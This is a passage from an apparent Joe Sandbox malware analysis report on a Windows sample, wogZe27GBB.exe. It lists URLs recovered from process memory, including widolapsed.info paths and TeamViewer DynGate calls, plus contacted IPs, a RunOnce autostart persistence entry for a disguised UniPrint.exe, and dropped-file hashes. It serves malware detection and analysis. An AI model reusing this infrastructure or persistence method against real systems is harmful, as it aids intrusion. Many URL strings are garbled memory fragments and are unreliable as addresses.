                      • Avira URL Cloud: safe
                      		unknown
                      https://dev.ditu.live.com/REST/v1/Traffic/Incidents/svchost.exe, 0000000B.00000002.317254879.000001BF6065C000.00000004.00000001.sdmpfalse
                        		high
                        https://t0.tiles.ditu.live.com/tiles/gensvchost.exe, 0000000B.00000002.317241636.000001BF6064E000.00000004.00000001.sdmpfalse
                          		high
                          https://dev.virtualearth.net/REST/v1/Routes/Walkingsvchost.exe, 0000000B.00000003.316714010.000001BF60661000.00000004.00000001.sdmpfalse
                            		high
                            http://www.TeamViewer.com/helpwogZe27GBB.exe, 00000000.00000002.249977662.0000000002868000.00000004.00000001.sdmp, UniPrint.exe, 00000002.00000001.248636315.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000004.00000002.551625203.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000010.00000002.350593639.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000011.00000002.355308104.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000012.00000002.372774067.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000014.00000001.366478511.0000000010000000.00000002.00020000.sdmpfalse
                              		high
                              https://widolapsed.info/8C631A8/eUniPrint.exe, 00000004.00000003.494744878.00000000057D5000.00000004.00000001.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://widolapsed.info/8C631A8/esources/StoreAppNUniPrint.exe, 00000004.00000002.545681944.00000000057D5000.00000004.00000001.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://dev.ditu.live.com/REST/v1/Imagery/Copyright/svchost.exe, 0000000B.00000003.316757092.000001BF6065A000.00000004.00000001.sdmpfalse
                                		high
                                http://www.TeamViewer.com/downloadwogZe27GBB.exe, 00000000.00000002.249977662.0000000002868000.00000004.00000001.sdmp, UniPrint.exe, 00000002.00000001.248636315.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000004.00000002.551625203.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000010.00000002.350593639.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000011.00000002.355308104.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000012.00000002.372774067.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000014.00000001.366478511.0000000010000000.00000002.00020000.sdmpfalse
                                  		high
                                  https://dev.virtualearth.net/REST/v1/Transit/Schedules/svchost.exe, 0000000B.00000003.316808390.000001BF60641000.00000004.00000001.sdmpfalse
                                    		high
                                    http://mastr12.teamviewer.com/din.aspx?s=0000000&client=DynGate&rnd=7UniPrint.exe, 00000004.00000002.537928524.0000000003B1C000.00000004.00000001.sdmpfalse
                                      		high
                                      https://widolapsed.info/B8C631A8/8UniPrint.exe, 00000004.00000003.308537365.00000000057A7000.00000004.00000001.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://widolapsed.info/B8C631A8/9UniPrint.exe, 00000004.00000003.444226762.00000000057D5000.00000004.00000001.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://widolapsed.info/B8C631A8/ackageDisplayNameUniPrint.exe, 00000004.00000003.494744878.00000000057D5000.00000004.00000001.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://188.172.198.151/din.aspx?s=12418339&m=fast&client=DynGate&p=1000UniPrint.exe, 00000004.00000002.537928524.0000000003B1C000.00000004.00000001.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://appexmapsappupdate.blob.core.windows.netsvchost.exe, 0000000B.00000003.316714010.000001BF60661000.00000004.00000001.sdmpfalse
                                        		high
                                        https://widolapsed.info/B8C631A8/pNameUniPrint.exe, 00000004.00000003.494744878.00000000057D5000.00000004.00000001.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.TeamViewer.com#http://www.TeamViewer.com/licensingwogZe27GBB.exe, 00000000.00000002.249977662.0000000002868000.00000004.00000001.sdmp, UniPrint.exe, 00000002.00000001.248636315.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000004.00000002.551625203.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000010.00000002.350593639.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000011.00000002.355308104.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000012.00000002.372774067.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000014.00000001.366478511.0000000010000000.00000002.00020000.sdmpfalse
                                          		high
                                          http://master12.teamviewer.com/din.aspx?s=00000000&client=DynGate&rnd=78504903&p=10000001&%UniPrint.exe, 00000004.00000003.435218203.00000000057A7000.00000004.00000001.sdmpfalse
                                            		high
                                            http://www.bingmapsportal.comsvchost.exe, 0000000B.00000002.317142598.000001BF60613000.00000004.00000001.sdmpfalse
                                              		high
                                              https://widolapsed.info/apsed.info/8C631A8/9UniPrint.exe, 00000004.00000003.489357888.00000000057D5000.00000004.00000001.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              https://widolapsed.info/2iUniPrint.exe, 00000004.00000003.303052348.00000000057D5000.00000004.00000001.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              https://widolapsed.info/B8C631A8/lopmentPropertieslUniPrint.exe, 00000004.00000003.444226762.00000000057D5000.00000004.00000001.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              https://widolapsed.info/aUniPrint.exe, 00000004.00000003.451977098.00000000057D5000.00000004.00000001.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.teamviewer.com/help/connectivity.aspx:wogZe27GBB.exe, 00000000.00000002.249977662.0000000002868000.00000004.00000001.sdmp, UniPrint.exe, 00000002.00000001.248636315.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000004.00000002.551625203.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000010.00000002.350593639.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000011.00000002.355308104.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000012.00000002.372774067.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000014.00000001.366478511.0000000010000000.00000002.00020000.sdmpfalse
                                                		high
                                                https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdv?pv=1&r=svchost.exe, 0000000B.00000003.316800598.000001BF60645000.00000004.00000001.sdmpfalse
                                                  		high
                                                  https://widolapsed.info/8C631A8/9UniPrint.exe, 00000004.00000003.494744878.00000000057D5000.00000004.00000001.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.teamviewer.com/favicon.icowogZe27GBB.exe, 00000000.00000002.249977662.0000000002868000.00000004.00000001.sdmp, UniPrint.exe, 00000002.00000001.248636315.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000004.00000002.533082315.00000000028DE000.00000004.00000001.sdmp, UniPrint.exe, 00000004.00000002.551625203.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000010.00000002.350593639.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000011.00000002.355308104.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000012.00000002.372774067.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000014.00000001.366478511.0000000010000000.00000002.00020000.sdmpfalse
                                                    		high
                                                    https://widolapsed.info/UniPrint.exe, 00000004.00000003.444226762.00000000057D5000.00000004.00000001.sdmp, UniPrint.exe, 00000004.00000003.379905527.00000000057D5000.00000004.00000001.sdmp, UniPrint.exe, 00000004.00000003.316322889.00000000057D5000.00000004.00000001.sdmp, UniPrint.exe, 00000004.00000003.460571183.00000000057D5000.00000004.00000001.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    https://dev.virtualearth.net/REST/v1/Routes/svchost.exe, 0000000B.00000002.317218573.000001BF6063D000.00000004.00000001.sdmpfalse
                                                      		high
                                                      https://widolapsed.info/B8C631A8/lopmentPropertieshUniPrint.exe, 00000004.00000003.444226762.00000000057D5000.00000004.00000001.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      https://widolapsed.info/B8C631A8/esources/StoreAppNUniPrint.exe, 00000004.00000003.444226762.00000000057D5000.00000004.00000001.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      https://widolapsed.info/B8C631A8/d.info/B8C631A8/UniPrint.exe, 00000004.00000003.379200176.00000000057A7000.00000004.00000001.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      https://widolapsed.info/3DViewer_2.1803.8022.0_x64_UniPrint.exe, 00000004.00000003.444226762.00000000057D5000.00000004.00000001.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://crl.ver)svchost.exe, 00000003.00000002.538052811.0000024FB000E000.00000004.00000001.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		low
                                                      http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0swogZe27GBB.exe, 00000000.00000002.249977662.0000000002868000.00000004.00000001.sdmpfalse
                                                      • URL Reputation: safe
                                                      		unknown
                                                      http://188.172.198.151/din.aspx?s=00000000&m=fast&client=DynGate&rnd=78504903&p=10000001vUniPrint.exe, 00000004.00000003.298188774.00000000057A7000.00000004.00000001.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://nsis.sf.net/NSIS_ErrorErrorwogZe27GBB.exe, 00000000.00000002.248459758.0000000000409000.00000004.00020000.sdmpfalse
                                                        		high
                                                        https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=svchost.exe, 0000000B.00000002.317142598.000001BF60613000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000002.317218573.000001BF6063D000.00000004.00000001.sdmpfalse
                                                          		high
                                                          https://widolapsed.info/erviceUniPrint.exe, 00000004.00000003.379905527.00000000057D5000.00000004.00000001.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          https://widolapsed.info/iUniPrint.exe, 00000004.00000003.481410319.00000000057D5000.00000004.00000001.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          https://%s.xboxlive.comsvchost.exe, 00000009.00000002.512367598.0000026C67243000.00000004.00000001.sdmpfalse
                                                          • URL Reputation: safe
                                                          		low
                                                          https://dev.virtualearth.net/REST/v1/Locationssvchost.exe, 0000000B.00000003.316714010.000001BF60661000.00000004.00000001.sdmpfalse
                                                            		high
                                                            https://ecn.dev.virtualearth.net/mapcontrol/mapconfiguration.ashx?name=native&v=svchost.exe, 0000000B.00000003.295010254.000001BF60631000.00000004.00000001.sdmpfalse
                                                              		high
                                                              http://www.teamviewer.com/download/beta.aspxwogZe27GBB.exe, 00000000.00000002.249977662.0000000002868000.00000004.00000001.sdmp, UniPrint.exe, 00000002.00000001.248636315.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000004.00000002.551625203.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000010.00000002.350593639.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000011.00000002.355308104.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000012.00000002.372774067.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000014.00000001.366478511.0000000010000000.00000002.00020000.sdmpfalse
                                                                		high
                                                                http://www.teamviewer.com/ja/integrated/trial.aspx?ID=%1%&IC=%2%wogZe27GBB.exe, 00000000.00000002.249977662.0000000002868000.00000004.00000001.sdmp, UniPrint.exe, 00000002.00000001.248636315.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000004.00000002.551625203.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000010.00000002.350593639.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000011.00000002.355308104.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000012.00000002.372774067.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000014.00000001.366478511.0000000010000000.00000002.00020000.sdmpfalse
                                                                  		high
                                                                  https://widolapsed.info/apsed.info/ameCallableUI/resources/PkgUniPrint.exe, 00000004.00000003.379905527.00000000057D5000.00000004.00000001.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  		unknown
                                                                  https://widolapsed.info/vider/Resources/DisplayNamevUniPrint.exe, 00000004.00000003.379905527.00000000057D5000.00000004.00000001.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  		unknown
                                                                  http://188.172.198.151/din.aspx?s=12418339&m=fast&client=DynGate&p=10000002lUniPrint.exe, 00000004.00000003.432909141.00000000057F0000.00000004.00000001.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  		unknown
                                                                  http://master12.teamviewer.com/dout.aspx?s=40082849&p=10000001&client=DynGate&data=FyQSawCjHqkys5MkoUniPrint.exe, 00000004.00000003.435218203.00000000057A7000.00000004.00000001.sdmpfalse
                                                                    		high
                                                                    https://widolapsed.info/64__8wekyb3d8bbwe?ms-resource://MicrosoUniPrint.exe, 00000004.00000003.316322889.00000000057D5000.00000004.00000001.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    https://widolapsed.info/~UniPrint.exe, 00000004.00000003.379905527.00000000057D5000.00000004.00000001.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    https://dev.virtualearth.net/REST/v1/JsonFilter/VenueMaps/data/svchost.exe, 0000000B.00000002.317254879.000001BF6065C000.00000004.00000001.sdmpfalse
                                                                      		high
                                                                      http://nsis.sf.net/NSIS_ErrorwogZe27GBB.exe, wogZe27GBB.exe, 00000000.00000002.248459758.0000000000409000.00000004.00020000.sdmpfalse
                                                                        		high
                                                                        https://dynamic.tsvchost.exe, 0000000B.00000003.316700720.000001BF60664000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000003.316757092.000001BF6065A000.00000004.00000001.sdmpfalse
                                                                        • URL Reputation: safe
                                                                        		unknown
                                                                        https://widolapsed.info/B8C631A8/resource://MicrosoUniPrint.exe, 00000004.00000003.332650410.00000000057D5000.00000004.00000001.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        		unknown
                                                                        https://widolapsed.info/8C631A8/ources/DisplayNamevUniPrint.exe, 00000004.00000003.494744878.00000000057D5000.00000004.00000001.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        		unknown
                                                                        https://dev.virtualearth.net/REST/v1/Routes/Transitsvchost.exe, 0000000B.00000003.316714010.000001BF60661000.00000004.00000001.sdmpfalse
                                                                          		high
                                                                          https://widolapsed.info/-resource://Microsoft.Microsoft3DViewer4UniPrint.exe, 00000004.00000003.444226762.00000000057D5000.00000004.00000001.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          		unknown
                                                                          http://188.172.198.151/client=DynGate&rnd=78504903&p=10000001UniPrint.exe, 00000004.00000003.297514251.00000000057D6000.00000004.00000001.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          		unknown
                                                                          https://widolapsed.info/B8C631A8/ources/DisplayNamevUniPrint.exe, 00000004.00000003.444226762.00000000057D5000.00000004.00000001.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          		unknown
                                                                          https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=svchost.exe, 0000000B.00000002.317254879.000001BF6065C000.00000004.00000001.sdmpfalse
                                                                            		high
                                                                            http://www.teamviewer.com/ja/company/shutdown.aspxwogZe27GBB.exe, 00000000.00000002.249977662.0000000002868000.00000004.00000001.sdmp, UniPrint.exe, 00000002.00000001.248636315.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000004.00000002.551625203.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000010.00000002.350593639.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000011.00000002.355308104.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000012.00000002.372774067.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000014.00000001.366478511.0000000010000000.00000002.00020000.sdmpfalse
                                                                              		high
                                                                              http://188.172.198.151/dout.aspx?s=12418339&p=10000002&clientUniPrint.exe, 00000004.00000002.537928524.0000000003B1C000.00000004.00000001.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              		unknown
                                                                              https://widolapsed.info/8C631A8/resource://MicrosoUniPrint.exe, 00000004.00000003.444226762.00000000057D5000.00000004.00000001.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              		unknown
                                                                              http://www.teamviewer.com/ja/licensing/commercialuse.aspxUniPrint.exe, 00000004.00000002.531799578.00000000027A0000.00000004.00000001.sdmpfalse
                                                                                		high
                                                                                https://widolapsed.info/B8C631A8/leUI/resources/PkgUniPrint.exe, 00000004.00000003.444226762.00000000057D5000.00000004.00000001.sdmpfalse
                                                                                • Avira URL Cloud: safe
                                                                                		unknown
                                                                                https://dev.ditu.live.com/REST/v1/JsonFilter/VenueMaps/data/svchost.exe, 0000000B.00000002.317254879.000001BF6065C000.00000004.00000001.sdmpfalse
                                                                                  		high
                                                                                  https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=svchost.exe, 0000000B.00000003.316757092.000001BF6065A000.00000004.00000001.sdmpfalse
                                                                                    		high
                                                                                    https://www.teamviewer.com/licensing/order.aspx?lng=jawogZe27GBB.exe, 00000000.00000002.249977662.0000000002868000.00000004.00000001.sdmp, UniPrint.exe, 00000002.00000001.248636315.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000004.00000002.551625203.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000010.00000002.350593639.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000011.00000002.355308104.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000012.00000002.372774067.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000014.00000001.366478511.0000000010000000.00000002.00020000.sdmpfalse
                                                                                      		high
                                                                                      http://master12.teamviewer.com/din.aspx?s=40082864&client=DynGate&p=10000002er12.teamviewer.comUniPrint.exe, 00000004.00000003.297514251.00000000057D6000.00000004.00000001.sdmpfalse
                                                                                        		high
                                                                                        http://www.teamviewer.com/download/version_4x/TeamViewerQS.exewogZe27GBB.exe, 00000000.00000002.249977662.0000000002868000.00000004.00000001.sdmp, UniPrint.exe, 00000002.00000001.248636315.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000004.00000002.551625203.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000010.00000002.350593639.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000011.00000002.355308104.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000012.00000002.372774067.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000014.00000001.366478511.0000000010000000.00000002.00020000.sdmpfalse
                                                                                          		high
                                                                                          http://www.teamviewer.com/CConnectionHistoryManager::createMessageString():wogZe27GBB.exe, 00000000.00000002.249977662.0000000002868000.00000004.00000001.sdmp, UniPrint.exe, 00000002.00000002.290939272.0000000000733000.00000002.00020000.sdmp, UniPrint.exe, 00000004.00000002.515647871.0000000000733000.00000002.00020000.sdmp, UniPrint.exe, 00000010.00000000.324994996.0000000000733000.00000002.00020000.sdmp, UniPrint.exe, 00000011.00000000.337843265.0000000000733000.00000002.00020000.sdmp, UniPrint.exe, 00000012.00000002.369184803.0000000000733000.00000002.00020000.sdmp, UniPrint.exe, 00000014.00000000.364825384.0000000000733000.00000002.00020000.sdmpfalse
                                                                                            		high
                                                                                            http://master12.teamviewer.com/dout.aspx?s=40082873&p=10000001&client=DynGate&data=FyQS6QChtjSytzoeqUniPrint.exe, 00000004.00000003.444226762.00000000057D5000.00000004.00000001.sdmpfalse
                                                                                              		high
                                                                                              https://widolapsed.info/8C631A8/al_cw5n1h2txyewy?m0UniPrint.exe, 00000004.00000003.494744878.00000000057D5000.00000004.00000001.sdmpfalse
                                                                                              • Avira URL Cloud: safe
                                                                                              		unknown
                                                                                              https://widolapsed.info/apsed.info/3DViewer_2.1803.8022.0_x64_UniPrint.exe, 00000004.00000003.446837962.00000000057D5000.00000004.00000001.sdmpfalse
                                                                                              • Avira URL Cloud: safe
                                                                                              		unknown
                                                                                              http://ocsp.sectigo.com0wogZe27GBB.exe, 00000000.00000002.249977662.0000000002868000.00000004.00000001.sdmpfalse
                                                                                              • URL Reputation: safe
                                                                                              		unknown
                                                                                              https://dev.virtualearth.net/REST/v1/Routes/Drivingsvchost.exe, 0000000B.00000003.316714010.000001BF60661000.00000004.00000001.sdmpfalse
                                                                                                		high
                                                                                                https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashxsvchost.exe, 0000000B.00000002.317218573.000001BF6063D000.00000004.00000001.sdmpfalse
                                                                                                  		high
                                                                                                  https://widolapsed.info/apsed.info/B8C631A8/lopmentPropertieshUniPrint.exe, 00000004.00000003.494744878.00000000057D5000.00000004.00000001.sdmpfalse
                                                                                                  • Avira URL Cloud: safe
                                                                                                  		unknown
                                                                                                  http://188.172.198.151/UniPrint.exe, 00000004.00000003.297421541.0000000000AD4000.00000004.00000001.sdmpfalse
                                                                                                  • Avira URL Cloud: safe
                                                                                                  		unknown
                                                                                                  https://widolapsed.info/1UniPrint.exe, 00000004.00000003.325324514.00000000057D5000.00000004.00000001.sdmpfalse
                                                                                                  • Avira URL Cloud: safe
                                                                                                  		unknown
                                                                                                  https://widolapsed.info/s/StoreAppNameUniPrint.exe, 00000004.00000003.444226762.00000000057D5000.00000004.00000001.sdmpfalse
                                                                                                  • Avira URL Cloud: safe
                                                                                                  		unknown
                                                                                                  http://www.teamviewer.com/download/version_5x/TeamViewerQS.exewogZe27GBB.exe, 00000000.00000002.249977662.0000000002868000.00000004.00000001.sdmp, UniPrint.exe, 00000002.00000001.248636315.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000004.00000002.551625203.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000010.00000002.350593639.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000011.00000002.355308104.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000012.00000002.372774067.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000014.00000001.366478511.0000000010000000.00000002.00020000.sdmpfalse
                                                                                                    		high
                                                                                                    https://dev.virtualearth.net/mapcontrol/HumanScaleServices/GetBubbles.ashx?n=svchost.exe, 0000000B.00000003.316808390.000001BF60641000.00000004.00000001.sdmpfalse
                                                                                                      		high

                                                                                                      Contacted IPs

                                                                                                      • No. of IPs < 25%
                                                                                                      • 25% < No. of IPs < 50%
                                                                                                      • 50% < No. of IPs < 75%
                                                                                                      • 75% < No. of IPs

                                                                                                      Public

                                                                                                      IPDomainCountryFlagASNASN NameMalicious
                                                                                                      185.188.32.22
                                                                                                      		master12.teamviewer.comGermany
                                                                                                      		43304TEAMVIEWER-ASDEfalse
                                                                                                      188.172.198.151
                                                                                                      		unknownAustria
                                                                                                      		42473AS-ANEXIAANEXIAInternetdienstleistungsGmbHATfalse
                                                                                                      45.153.241.148
                                                                                                      		widolapsed.infoGermany
                                                                                                      		30823COMBAHTONcombahtonGmbHDEfalse

                                                                                                      Private

                                                                                                      IP
                                                                                                      192.168.2.1
                                                                                                      127.0.0.1

                                                                                                      General Information

                                                                                                      Joe Sandbox Version:33.0.0 White Diamond
                                                                                                      Analysis ID:483790
                                                                                                      Start date:15.09.2021
                                                                                                      Start time:13:43:48
                                                                                                      Joe Sandbox Product:CloudBasic
                                                                                                      Overall analysis duration:0h 15m 13s
                                                                                                      Hypervisor based Inspection enabled:false
                                                                                                      Report type:light
                                                                                                      Sample file name:wogZe27GBB (renamed file extension from none to exe)
                                                                                                      Cookbook file name:default.jbs
                                                                                                      Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                      Number of analysed new started processes analysed:28
                                                                                                      Number of new started drivers analysed:0
                                                                                                      Number of existing processes analysed:0
                                                                                                      Number of existing drivers analysed:0
                                                                                                      Number of injected processes analysed:0
                                                                                                      Technologies:
                                                                                                      • HCA enabled
                                                                                                      • EGA enabled
                                                                                                      • HDC enabled
                                                                                                      • AMSI enabled
                                                                                                      Analysis Mode:default
                                                                                                      Analysis stop reason:Timeout
                                                                                                      Detection:MAL
                                                                                                      Classification:mal76.evad.winEXE@23/18@4/5
                                                                                                      EGA Information:Failed
                                                                                                      HDC Information:
                                                                                                      • Successful, ratio: 23% (good quality ratio 22.2%)
                                                                                                      • Quality average: 82.6%
                                                                                                      • Quality standard deviation: 25.5%
                                                                                                      HCA Information:Failed
                                                                                                      Cookbook Comments:
                                                                                                      • Adjust boot time
                                                                                                      • Enable AMSI
                                                                                                      Warnings:
                                                                                                      Show All
                                                                                                      • Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, UsoClient.exe
                                                                                                      • TCP Packets have been reduced to 100
                                                                                                      • Excluded IPs from analysis (whitelisted): 23.35.236.56, 20.82.210.154, 209.197.3.8, 40.112.88.60, 23.216.77.208, 23.216.77.209, 20.54.110.249
                                                                                                      • Excluded domains from analysis (whitelisted): fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, wu-shim.trafficmanager.net, ris-prod.trafficmanager.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, asf-ris-prod-neu.northeurope.cloudapp.azure.com, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, cds.d2s7q6s2.hwcdn.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, ris.api.iris.microsoft.com, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                                                                                                      • Not all processes where analyzed, report is missing behavior information
                                                                                                      • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                      • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                      • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                      • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                      • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                      • VT rate limit hit for: /opt/package/joesandbox/database/analysis/483790/sample/wogZe27GBB.exe

                                                                                                      Simulations

                                                                                                      Behavior and APIs

                                                                                                      TimeTypeDescription
                                                                                                      13:45:03API Interceptor2x Sleep call for process: svchost.exe modified
                                                                                                      13:45:17API Interceptor45x Sleep call for process: UniPrint.exe modified
                                                                                                      13:45:23AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce UniPrint.exe "C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe" f
                                                                                                      13:45:31AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\RunOnce UniPrint.exe "C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe" f
                                                                                                      13:46:22API Interceptor1x Sleep call for process: MpCmdRun.exe modified

                                                                                                      Joe Sandbox View / Context

                                                                                                      IPs

                                                                                                      No context

                                                                                                      Domains

                                                                                                      No context

                                                                                                      ASN

                                                                                                      No context

                                                                                                      JA3 Fingerprints

                                                                                                      No context

                                                                                                      Dropped Files

                                                                                                      No context

                                                                                                      Created / dropped Files

                                                                                                      C:\ProgramData\Microsoft\Network\Downloader\edb.log
                                                                                                      Process:C:\Windows\System32\svchost.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):4096
                                                                                                      Entropy (8bit):0.5981930978381301
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:6:0FIEk1GaD0JOCEfMuaaD0JOCEfMKQmDctAl/gz2cE0fMbhEZolrRSQ2hyYIIT:0kGaD0JcaaD0JwQQctAg/0bjSQJ
                                                                                                      MD5:9583F7C60F8EFC7CB04E9CFB7A705D43
                                                                                                      SHA1:72086359D312BEF7D4ECF7597594643796108F64
                                                                                                      SHA-256:04F0ECC8F9FCBFDEFD04601E9249E32B78E12E985F15059E91EF4B9DF138E4AE
                                                                                                      SHA-512:5F2D38182933C9B7AAAAE8782F93EAF39F6BFBE7549FDF7D1D9B2EA2859F60880A1217FD9E577ABE2CDB6EA1C4AA2E01F6D0FB1D9CA1C08776D1DDD5EE35D428
                                                                                                      Malicious:false
                                                                                                      Reputation:unknown
                                                                                                      Preview: ......:{..(......-...y).............. ..1C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@....................-...y)...........&......e.f.3...w.......................3...w..................h..C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b...G............................................................................................................................................................................................................
                                                                                                      C:\ProgramData\Microsoft\Network\Downloader\qmgr.db
                                                                                                      Process:C:\Windows\System32\svchost.exe
                                                                                                      File Type:Extensible storage engine DataBase, version 0x620, checksum 0xbcd629f4, page size 16384, DirtyShutdown, Windows version 10.0
                                                                                                      Category:dropped
                                                                                                      Size (bytes):32768
                                                                                                      Entropy (8bit):0.09602595647092171
